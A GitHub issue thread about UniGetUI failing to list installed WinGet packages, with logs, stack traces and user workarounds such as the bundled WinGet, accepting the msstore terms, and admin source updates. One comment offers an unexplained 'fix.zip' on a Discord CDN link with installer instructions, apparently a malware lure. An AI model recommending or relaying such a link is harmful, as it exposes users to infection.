### ISSUE TITLE
[Bug] UniGetUI doesn't find any installed packages, just once and then never again

### ISSUE THREAD

**Issue by ullic** [marticliment/UniGetUI#2698]
### Please confirm these before moving forward

- [X] I have searched for my issue and have not found a work-in-progress/duplicate/resolved issue.
- [X] I have tested that this issue has not been fixed in the latest [(beta or stable) release](https://github.com/marticliment/WingetUI/releases/).
- [X] I have checked the [FAQ](https://github.com/marticliment/WingetUI#frequently-asked-questions) section for solutions.
- [X] This issue is about a bug (if it is not, please use the [correct template](https://github.com/marticliment/WingetUI/issues/new/choose)).

### UniGetUI Version

3.1.1

### Windows version, edition, and architecture

Windows 10 Enterprise x64

### Describe your issue

Installed UniGetUI and executed once. Scan for installed software worked properly, updates where downloaded and installed also properly.
The next day UniGetUI doesn't find any installed packages nor updates any longer.
Uninstalled it and deleted \AppData\Local\Microsoft\WinGet\Settings\defaultState\sources_metadata for all users as suggested in [https://github.com/marticliment/UniGetUI/issues/1720](url). Installed again, but the same result, no installed software found any longer

According to logs, Winget can't  connect to installedSearchCatalogRef , but I don't know how to fix that...

### UniGetUI Log

```text
[01.09.2024 08:51:36]    __  __      _ ______     __  __  ______
                        / / / /___  (_) ____/__  / /_/ / / /  _/
                       / / / / __ \/ / / __/ _ \/ __/ / / // /
                      / /_/ / / / / / /_/ /  __/ /_/ /_/ // /
                      \____/_/ /_/_/\____/\___/\__/\____/___/
                          Welcome to UniGetUI Version 3.1.1
[01.09.2024 08:51:36]
[01.09.2024 08:51:36] Version Code:  3,11
[01.09.2024 08:51:36] System.FormatException: The input string '850.' was not in a correct format.
                         at System.Number.ThrowFormatException[TChar](ReadOnlySpan`1 value)
                         at System.Int32.Parse(String s)
                         at UniGetUI.Core.Data.CoreData.GetCodePage() in C:\SomePrograms\WingetUI-Store\src\UniGetUI.Core.Data\CoreData.cs:line 26
[01.09.2024 08:51:36] Encoding Code Page set to 0
[01.09.2024 08:51:36] Using bundled GSudo at C:\Program Files\UniGetUI\Assets\Utilities\gsudo.exe
[01.09.2024 08:51:36] Loaded language locale: de
[01.09.2024 08:51:37] Randomly-generated background API auth token for the current session: qwx9p3o5ctrjxkjic5psfy2pjxv690xkj8o7xtb0vd1vsr2dod78hox9hzif0wdv
[01.09.2024 08:51:37] Api running on http://localhost:7058
[01.09.2024 08:51:37] ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                      █▀▀▀▀▀▀▀▀▀▀▀▀▀ MANAGER LOADED ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
                      █ Name: Chocolatey
                      █ Enabled: True
                      █ Found: False
                      █ THE MANAGER WAS NOT FOUND. PERHAPS IT IS NOT 
                      █ INSTALLED OR IT HAS BEEN MISCONFIGURED 
                      ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
[01.09.2024 08:51:37] Lang files were updated successfully from GitHub
[01.09.2024 08:51:37] UniGetUI is up to date
[01.09.2024 08:51:38] Command npm was not found on the system
[01.09.2024 08:51:38] ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                      █▀▀▀▀▀▀▀▀▀▀▀▀▀ MANAGER LOADED ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
                      █ Name: Npm
                      █ Enabled: True
                      █ Found: False
                      █ THE MANAGER WAS NOT FOUND. PERHAPS IT IS NOT 
                      █ INSTALLED OR IT HAS BEEN MISCONFIGURED 
                      ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
[01.09.2024 08:51:38] Command dotnet.exe was not found on the system
[01.09.2024 08:51:38] ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                      █▀▀▀▀▀▀▀▀▀▀▀▀▀ MANAGER LOADED ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
                      █ Name: .NET Tool
                      █ Enabled: True
                      █ Found: False
                      █ THE MANAGER WAS NOT FOUND. PERHAPS IT IS NOT 
                      █ INSTALLED OR IT HAS BEEN MISCONFIGURED 
                      ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
[01.09.2024 08:51:38] Command pwsh.exe was not found on the system
[01.09.2024 08:51:38] ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                      █▀▀▀▀▀▀▀▀▀▀▀▀▀ MANAGER LOADED ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
                      █ Name: PowerShell7
                      █ Enabled: True
                      █ Found: False
                      █ THE MANAGER WAS NOT FOUND. PERHAPS IT IS NOT 
                      █ INSTALLED OR IT HAS BEEN MISCONFIGURED 
                      ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
[01.09.2024 08:51:38] Downloaded new icons and screenshots successfully!
[01.09.2024 08:51:38] ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                      █▀▀▀▀▀▀▀▀▀▀▀▀▀ MANAGER LOADED ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
                      █ Name: Pip
                      █ Enabled: True
                      █ Found: True
                      █ Fancy exe name: pip
                      █ Executable path: C:\Users\ulli\AppData\Local\Microsoft\WindowsApps\python.exe
                      █ Call arguments:  -m pip
                      █ Version: 
                      █   
                      ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
[01.09.2024 08:51:39] ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                      █▀▀▀▀▀▀▀▀▀▀▀▀▀ MANAGER LOADED ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
                      █ Name: Winget
                      █ Enabled: True
                      █ Found: True
                      █ Fancy exe name: winget.exe
                      █ Executable path: C:\Users\ulli\AppData\Local\Microsoft\WindowsApps\winget.exe
                      █ Call arguments: 
                      █ Version: 
                      █   System WinGet CLI Version: v1.8.1911
                      █   Microsoft.WinGet.Client PSModule version: ""
                      █   Using Native WinGet helper (COM Api)
                      ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
[01.09.2024 08:51:39] Command scoop was not found on the system
[01.09.2024 08:51:39] ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                      █▀▀▀▀▀▀▀▀▀▀▀▀▀ MANAGER LOADED ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
                      █ Name: Scoop
                      █ Enabled: True
                      █ Found: False
                      █ THE MANAGER WAS NOT FOUND. PERHAPS IT IS NOT 
                      █ INSTALLED OR IT HAS BEEN MISCONFIGURED 
                      ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
[01.09.2024 08:51:41] ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                      █▀▀▀▀▀▀▀▀▀▀▀▀▀ MANAGER LOADED ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
                      █ Name: PowerShell
                      █ Enabled: True
                      █ Found: True
                      █ Fancy exe name: powershell.exe
                      █ Executable path: C:\WINDOWS\system32\windowspowershell\v1.0\powershell.exe
                      █ Call arguments:  -NoProfile -Command
                      █ Version: 
                      █   Name                           Value                                                                                   
                      █   ----                           -----                                                                                   
                      █   PSVersion                      5.1.19041.4780                                                                          
                      █   PSEdition                      Desktop                                                                                 
                      █   PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0...}                                                                 
                      █   BuildVersion                   10.0.19041.4780                                                                         
                      █   CLRVersion                     4.0.30319.42000                                                                         
                      █   WSManStackVersion              3.0                                                                                     
                      █   PSRemotingProtocolVersion      2.3                                                                                     
                      █   SerializationVersion           1.1.0.1
                      ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
[01.09.2024 08:51:42] Resetting administrator rights cache for process id 8272
[01.09.2024 08:51:42] Resetting administrator rights cache for process id 8272
[01.09.2024 08:51:42] Microsoft.Powershell.Client detection has been forcefully skipped as the module is not required on the current context
[01.09.2024 08:51:42] Dependency WinGet PowerShell Module for manager Winget is present
[01.09.2024 08:51:42] LoadComponentsAsync finished executing. All managers loaded. Proceeding to interface.
[01.09.2024 08:51:42] Found 0 available updates from Pip
[01.09.2024 08:51:42] Found 0 installed packages from Pip
[01.09.2024 08:51:45] Found 0 installed packages from PowerShell
[01.09.2024 08:51:46] Found 0 available updates from PowerShell
[01.09.2024 08:51:51] Error finding installed packages on manager Winget
[01.09.2024 08:51:51] System.InvalidOperationException: WinGet: Failed to connect to composite catalog.
                         at UniGetUI.PackageEngine.Managers.WingetManager.NativeWinGetHelper.GetLocalWinGetPackages(INativeTaskLogger logger) in C:\SomePrograms\WingetUI-Store\src\UniGetUI.PackageEngine.Managers.WinGet\WinGetHelpers\NativeWinGetHelper.cs:line 192
                         at UniGetUI.PackageEngine.Managers.WingetManager.NativeWinGetHelper.<>c__DisplayClass5_0.<GetInstalledPackages_UnSafe>b__0() in C:\SomePrograms\WingetUI-Store\src\UniGetUI.PackageEngine.Managers.WinGet\WinGetHelpers\NativeWinGetHelper.cs:line 157
                         at System.Threading.Tasks.Task`1.InnerInvoke()
                         at System.Threading.ExecutionContext.RunFromThreadPoolDispatchLoop(Thread threadPoolThread, ExecutionContext executionContext, ContextCallback callback, Object state)
                      --- End of stack trace from previous location ---
                         at System.Threading.ExecutionContext.RunFromThreadPoolDispatchLoop(Thread threadPoolThread, ExecutionContext executionContext, ContextCallback callback, Object state)
                         at System.Threading.Tasks.Task.ExecuteWithThreadLocal(Task& currentTaskSlot, Thread threadPoolThread)
                      --- End of stack trace from previous location ---
                         at UniGetUI.PackageEngine.Managers.WingetManager.NativeWinGetHelper.GetInstalledPackages_UnSafe(WinGet Manager) in C:\SomePrograms\WingetUI-Store\src\UniGetUI.PackageEngine.Managers.WinGet\WinGetHelpers\NativeWinGetHelper.cs:line 157
                         at UniGetUI.PackageEngine.Managers.WingetManager.WinGet.<GetInstalledPackages_UnSafe>b__28_0() in C:\SomePrograms\WingetUI-Store\src\UniGetUI.PackageEngine.Managers.WinGet\WinGet.cs:line 138
                         at System.Threading.Tasks.Task`1.InnerInvoke()
                         at System.Threading.ExecutionContext.RunFromThreadPoolDispatchLoop(Thread threadPoolThread, ExecutionContext executionContext, ContextCallback callback, Object state)
                      --- End of stack trace from previous location ---
                         at System.Threading.ExecutionContext.RunFromThreadPoolDispatchLoop(Thread threadPoolThread, ExecutionContext executionContext, ContextCallback callback, Object state)
                         at System.Threading.Tasks.Task.ExecuteWithThreadLocal(Task& currentTaskSlot, Thread threadPoolThread)
                      --- End of stack trace from previous location ---
                         at UniGetUI.PackageEngine.Managers.WingetManager.WinGet.GetInstalledPackages_UnSafe() in C:\SomePrograms\WingetUI-Store\src\UniGetUI.PackageEngine.Managers.WinGet\WinGet.cs:line 138
                         at UniGetUI.PackageEngine.ManagerClasses.Manager.PackageManager.GetInstalledPackages() in C:\SomePrograms\WingetUI-Store\src\UniGetUI.PackageEngine.PackageManagerClasses\Manager\PackageManager.cs:line 215
[01.09.2024 08:51:51] Backup saved to C:\Users\ulli\Documents\UniGetUI\GROOVEPATROL installierte Pakete 2024-09-01 08-51-51.json
[01.09.2024 08:51:53] Error finding updates on manager Winget
[01.09.2024 08:51:53] System.InvalidOperationException: WinGet: Failed to connect to composite catalog.
                         at UniGetUI.PackageEngine.Managers.WingetManager.NativeWinGetHelper.GetLocalWinGetPackages(INativeTaskLogger logger) in C:\SomePrograms\WingetUI-Store\src\UniGetUI.PackageEngine.Managers.WinGet\WinGetHelpers\NativeWinGetHelper.cs:line 192
                         at UniGetUI.PackageEngine.Managers.WingetManager.NativeWinGetHelper.<>c__DisplayClass4_0.<GetAvailableUpdates_UnSafe>b__0() in C:\SomePrograms\WingetUI-Store\src\UniGetUI.PackageEngine.Managers.WinGet\WinGetHelpers\NativeWinGetHelper.cs:line 137
                         at System.Threading.Tasks.Task`1.InnerInvoke()
                         at System.Threading.ExecutionContext.RunFromThreadPoolDispatchLoop(Thread threadPoolThread, ExecutionContext executionContext, ContextCallback callback, Object state)
                      --- End of stack trace from previous location ---
                         at System.Threading.ExecutionContext.RunFromThreadPoolDispatchLoop(Thread threadPoolThread, ExecutionContext executionContext, ContextCallback callback, Object state)
                         at System.Threading.Tasks.Task.ExecuteWithThreadLocal(Task& currentTaskSlot, Thread threadPoolThread)
                      --- End of stack trace from previous location ---
                         at UniGetUI.PackageEngine.Managers.WingetManager.NativeWinGetHelper.GetAvailableUpdates_UnSafe(WinGet Manager) in C:\SomePrograms\WingetUI-Store\src\UniGetUI.PackageEngine.Managers.WinGet\WinGetHelpers\NativeWinGetHelper.cs:line 137
                         at UniGetUI.PackageEngine.Managers.WingetManager.WinGet.<GetAvailableUpdates_UnSafe>b__27_0() in C:\SomePrograms\WingetUI-Store\src\UniGetUI.PackageEngine.Managers.WinGet\WinGet.cs:line 133
                         at System.Threading.Tasks.Task`1.InnerInvoke()
                         at System.Threading.ExecutionContext.RunFromThreadPoolDispatchLoop(Thread threadPoolThread, ExecutionContext executionContext, ContextCallback callback, Object state)
                      --- End of stack trace from previous location ---
                         at System.Threading.ExecutionContext.RunFromThreadPoolDispatchLoop(Thread threadPoolThread, ExecutionContext executionContext, ContextCallback callback, Object state)
                         at System.Threading.Tasks.Task.ExecuteWithThreadLocal(Task& currentTaskSlot, Thread threadPoolThread)
                      --- End of stack trace from previous location ---
                         at UniGetUI.PackageEngine.Managers.WingetManager.WinGet.GetAvailableUpdates_UnSafe() in C:\SomePrograms\WingetUI-Store\src\UniGetUI.PackageEngine.Managers.WinGet\WinGet.cs:line 133
                         at UniGetUI.PackageEngine.ManagerClasses.Manager.PackageManager.GetAvailableUpdates() in C:\SomePrograms\WingetUI-Store\src\UniGetUI.PackageEngine.PackageManagerClasses\Manager\PackageManager.cs:line 189
```

### Package Managers Logs

```text
Manager WinGet with version:
System WinGet CLI Version: v1.8.1911
Microsoft.WinGet.Client PSModule version: ""
Using Native WinGet helper (COM Api)

——————————————————————————————————————————


Logged native task on manager Winget. Task type is ListSources
Process start time: 01.09.2024 08:51:39
Process end time:   01.09.2024 08:51:39

-- Task information
 ...

The task reported success

——————————————————————————————————————————

Logged subprocess-based task on manager Winget. Task type is RefreshIndexes
Subprocess executable: "C:\Users\ulli\AppData\Local\Microsoft\WindowsApps\winget.exe"
Command-line arguments: " source update --disable-interactivity"
Process start time: 01.09.2024 08:51:41
Process end time:   01.09.2024 08:51:50

-- Process STDOUT
 ...

Return code: SUCCESS (0)

——————————————————————————————————————————

Logged native task on manager Winget. Task type is ListInstalledPackages
Process start time: 01.09.2024 08:51:41
Process end time:   01.09.2024 08:51:51

-- Task information
 ...

-- Task errors
  Failed to connect to installedSearchCatalogRef. Aborting.

The task reported a failure (1)

——————————————————————————————————————————

Logged native task on manager Winget. Task type is ListSources
Process start time: 01.09.2024 08:51:42
Process end time:   01.09.2024 08:51:42

-- Task information
 ...

The task reported success

——————————————————————————————————————————

Logged native task on manager Winget. Task type is ListUpdates
Process start time: 01.09.2024 08:51:50
Process end time:   01.09.2024 08:51:53

-- Task information
 ...

-- Task errors
  Failed to connect to installedSearchCatalogRef. Aborting.

The task reported a failure (1)

——————————————————————————————————————————
```

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by marticliment** [comment]
Hello,

You have a corrupt WinGet installation. Please navigate to Settings -> WinGet -> enable the option "Use bundled WinGet instead of System WinGet"

**Comment by michaelu123** [comment]
The same here, on an older Win10 laptop. Same message: WinGet: Failed to connect to composite catalog. The solution with the bundled winget worked. Winget succeeded also when I started UniGetUI as administrator, but then warnings popped up: don't run UniGetUI as admin. So apparently it is a problem with access rights. The winget itself does not seem to be so corrupt, because windows updates and "winget list" work normally.

**Comment by Dynamix69** [comment]
The same situation for me:
Unigetui ran for a few days on three systems after installation. Then, since one of the last updates, no more installed packages are listed. Uninstalling (with deletion of all directories with the same and similar names (Wingetui)) and reinstalling did nothing. Installing as a portable version didn't either. Neither did using the bundled Winget version.
The list remains empty.
The problem occurred on all three systems at the same time. The systems are Windows 11 with the latest patch level. Very little is installed on two systems.

**Comment by Mannshoch** [comment]
Same problem here. There is even no list of installed Software, there is no winget entry. Bundled Winget also not work.

**Comment by michaelu123** [comment]
To Dynamix69, Mannshoch and future posters: Perhaps it helps the maintainers if you look at the UniGetUI log and the packet manager logs, to be found in the three dots menu entry in the lower left (... More), look for error messages and post them here.

**Comment by Mannshoch** [comment]
```
[01.10.2024 08:20:56]
[01.10.2024 08:20:56] Version Code:  3.11
[01.10.2024 08:20:56] System.FormatException: The input string '850.' was not in a correct format.
                         at System.Number.ThrowFormatException[TChar](ReadOnlySpan`1 value)
                         at System.Int32.Parse(String s)
                         at UniGetUI.Core.Data.CoreData.GetCodePage() in C:\SomePrograms\WingetUI-Store\src\UniGetUI.Core.Data\CoreData.cs:line 26
[01.10.2024 08:20:56] Encoding Code Page set to 0
....
[01.10.2024 08:20:59] Cannot create native WinGet instance due to error: Bundled WinGet was forced by the user!
[01.10.2024 08:20:59] System.InvalidOperationException: Bundled WinGet was forced by the user!
                         at UniGetUI.PackageEngine.Managers.WingetManager.WinGet.LoadManager() in C:\SomePrograms\WingetUI-Store\src\UniGetUI.PackageEngine.Managers.WinGet\WinGet.cs:line 390
[01.10.2024 08:20:59] WinGet will resort to using BundledWinGetHelper()
[01.10.2024 08:20:59] ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                      █▀▀▀▀▀▀▀▀▀▀▀▀▀ MANAGER LOADED ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
                      █ Name: Winget
                      █ Enabled: True
                      █ Found: True
                      █ Fancy exe name: winget.exe
                      █ Executable path: C:\Program Files\UniGetUI\winget-cli_x64\winget.exe
                      █ Call arguments: 
                      █ Version: 
                      █   Bundled WinGet CLI Version: 
                      █   Microsoft.WinGet.Client PSModule version: ""
                      █   Using bundled WinGet helper (CLI parsing)
                      ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
[01.10.2024 08:21:00] Command scoop was not found on the system
```

**Comment by Rustbeard86** [comment]
Not sure if it is relevant to others but to solve this issue for me, I noticed I had just run bleachbit to clean up some junk on my system. Upon running "Winget list" in terminal I had to agree to a license agreement, pressing Y. Only after that could I get UniGet to process catalogs from winget.

**Comment by marticliment** [comment]
Hello, 

Please try UniGetUI 3.1.2-beta4. It has a built-in troubleshooter for WinGet that is supposed to fix this issue.

Download it here: https://github.com/marticliment/UniGetUI/releases/tag/3.1.2-beta4

**Comment by Dynamix69** [comment]
Hello,

does not work.

 



 

I have to mention, that I am running unigetui as „normal User“ not as Admin.

If I run it as admin, it´s appearing to work.

But it´s shown as not recommended.

 

Kind regards,

Michael

 

Von: Martí Climent ***@***.***> 
Gesendet: Donnerstag, 17. Oktober 2024 18:03
An: marticliment/UniGetUI ***@***.***>
Cc: Dynamix69 ***@***.***>; Comment ***@***.***>
Betreff: Re: [marticliment/UniGetUI] [Bug] UniGetUI doesn't find any installed packages, just once and then never again (Issue #2698)

 

Hello,

Please try UniGetUI 3.1.2-beta4. It has a built-in troubleshooter for WinGet that is supposed to fix this issue.

Download it here: https://github.com/marticliment/UniGetUI/releases/tag/3.1.2-beta4

**Comment by Rustbeard86** [comment]
UnigetUI attempted to repair winget today, I allowed this to happen twice. It was unsuccessful. However after executing the following command and accepting the terms UnigetUI functioned successfully.

`PowerShell 7.4.5
PS C:\Users\drewb> winget list
The `msstore` source requires that you view the following agreements before using.
Terms of Transaction: https://aka.ms/microsoft-store-terms-of-transaction
The source requires the current machine's 2-letter geographic region to be sent to the backend service to function properly (ex. "US").

Do you agree to all the source agreements terms?
[Y] Yes  [N] No:`

**Comment by usr20210909** [comment]
What did not fix this issue for me (Win11 23H2, UniGetUI 3.1.3):

- Letting UnigetUI repair Winget
- Using bundled Winget instead of system Winget
- Run the command `winget source update` as a normal user

What did help:

- Run the command `winget source update` as Administrator

Only then the winget sources got updated with success.

**Comment by pbhj** [comment]
> UnigetUI attempted to repair winget today, I allowed this to happen twice. It was unsuccessful. However after executing the following command and accepting the terms UnigetUI functioned successfully.
> 
> PowerShell 7.4.5 PS C:\Users\Rust> winget list The `msstore` source requires that you view the following agreements before using. Terms of Transaction: https://aka.ms/microsoft-store-terms-of-transaction The source requires the current machine's 2-letter geographic region to be sent to the backend service to function properly (ex. "US").
> 
> Do you agree to all the source agreements terms? [Y] Yes [N] No:

So, I had a broken Winget today, it launched initially fine, then ran an update and after that it didn't work.

I tried the repair, then restart for Uniget. 

I tried running "winget list" at an admin PowerShell. I had to agree to the terms, but this didn't fix the issue.

I tried "winget source update" and the source was updated, but this again didn't fix it for me.

I haven't [yet] tried the beta.

The winget manager loads (according to UnigetUI log): System WinGet CLI Version: v1.9.25180. The logged error (in red):
```
[02/11/2024 21:37:48] Error finding installed packages on manager Winget
[02/11/2024 21:37:48] System.AggregateException: One or more errors occurred. (WinGet: Failed to connect to composite catalog.)
                       ---> System.InvalidOperationException: WinGet: Failed to connect to composite catalog.
                         at UniGetUI.PackageEngine.Managers.WingetManager.NativeWinGetHelper.GetLocalWinGetPackages(INativeTaskLogger logger) in C:\SomePrograms\WingetUI-Store\src\UniGetUI.PackageEngine.Managers.WinGet\WinGetHelpers\NativeWinGetHelper.cs:line 211
                         at UniGetUI.PackageEngine.Managers.WingetManager.NativeWinGetHelper.GetInstalledPackages_UnSafe(WinGet Manager) in C:\SomePrograms\WingetUI-Store\src\UniGetUI.PackageEngine.Managers.WinGet\WinGetHelpers\NativeWinGetHelper.cs:line 176
                         at UniGetUI.PackageEngine.Managers.WingetManager.WinGet.GetInstalledPackages_UnSafe() in C:\SomePrograms\WingetUI-Store\src\UniGetUI.PackageEngine.Managers.WinGet\WinGet.cs:line 102
                         at System.Threading.Tasks.Task`1.InnerInvoke()
                         at System.Threading.ExecutionContext.RunFromThreadPoolDispatchLoop(Thread threadPoolThread, ExecutionContext executionContext, ContextCallback callback, Object state)
                      --- End of stack trace from previous location ---
                         at System.Threading.ExecutionContext.RunFromThreadPoolDispatchLoop(Thread threadPoolThread, ExecutionContext executionContext, ContextCallback callback, Object state)
                         at System.Threading.Tasks.Task.ExecuteWithThreadLocal(Task& currentTaskSlot, Thread threadPoolThread)
                         --- End of inner exception stack trace ---
                         at System.Threading.Tasks.Task.ThrowIfExceptional(Boolean includeTaskCanceledExceptions)
                         at System.Threading.Tasks.Task.Wait(Int32 millisecondsTimeout, CancellationToken cancellationToken)
                         at System.Threading.Tasks.Task.Wait(TimeSpan timeout, CancellationToken cancellationToken)
                         at System.Threading.Tasks.Task.Wait(TimeSpan timeout)
                         at UniGetUI.PackageEngine.ManagerClasses.Manager.PackageManager.GetInstalledPackages() in C:\SomePrograms\WingetUI-Store\src\UniGetUI.PackageEngine.PackageManagerClasses\Manager\PackageManager.cs:line 228

```

**Comment by Mannshoch** [comment]
Update from my side. I meanwhile found the cause of the Problem. The Company I'm working for established a GPO that lock Windows store. It seems it also affect winget and unigetui. I Propose to check such and prompt an information.
